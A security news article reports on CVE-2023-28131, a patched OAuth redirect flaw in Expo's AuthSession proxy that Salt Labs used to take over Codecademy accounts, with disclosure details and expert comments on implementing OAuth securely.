A critical API flaw in the Expo open-source framework allowed attackers to harvest auth credentials via the Open Authorization (OAuth) protocol. The vulnerability, while impacting a relatively small number of developers, had the potential to impact a wide range of users logging in to online services such as Facebook, Twitter or Spotify via the open-source framework, according to the researchers at Salt Labs who found the bugs.
A successful attack could of allowed an adversary to take over accounts and steal credentials on a mobile app or website that was configured to use the Expo AuthSession Redirect Proxy. Attacks could have been triggered simply by a victim clicking on a malicious link.
Expo (auth.expo.io) is used by developers to build native apps for iOS, Android and web platforms using a single set of tools, libraries and services and considered an effective way to accelerate the development process of applications.
"The vulnerability may impact hundreds of companies using Expo, including Codecademy," according to Salt Labs. Researchers stress "the surface area of auth.expo.io is small" thereby reducing the number of impacted social sign-on instances.
Codecademy is a popular online platform with 100 million users and offers free coding classes. "The Salt Labs team was able to exploit the Expo vulnerability on the Codecademy site to gain complete control of accounts," wrote researchers in a May 24 blog post.
The industry-standard OAuth is used by sites and apps as a “one click” login to access sites using social media accounts instead of the more traditional user registration and username/password authentication.
Researchers discovered that by manipulating steps in the OAuth sequences on the Expo site, they could hijack sessions and take over accounts; steal user financial and health data and perform actions as the user.
The researchers disclosed their findings to Expo, which quickly fixed the API vulnerability. Expo said the flaw, tracked as CVE-2023-28131 and with a CVSS rating of 9.6, had not been exploited in the wild.
The bug is classified as an API redirect vulnerability. The flaw traces back to the auth.expo.io framework and the fact it stored an app’s callback URL "before the user explicitly confirmed they trust the callback URL," according to a technical description. The vulnerability was identified in February, disclosed via the NIST national vulnerabilities database in April and updated May 2.
Zane Bond, head of product at Keeper Security, said engineers implementing OAuth should question what the different options do, choose the more secure option when possible, and be sure to validate the potential impact when choosing options outside of defaults.
“For security-conscious users, using OAuth to create accounts on third-party apps or websites comes with both security advantages and risks that should be weighed on a case-by-case basis,” said Bond.
Mike Parkin, senior technical engineer at Vulcan Cyber, said the potential risk from the OAuth vulnerability was relatively broad.
“The challenge with any authentication scheme, including OAuth, is implementing it securely … implementing OAuth securely is still a non-trivial task,” said Parkin.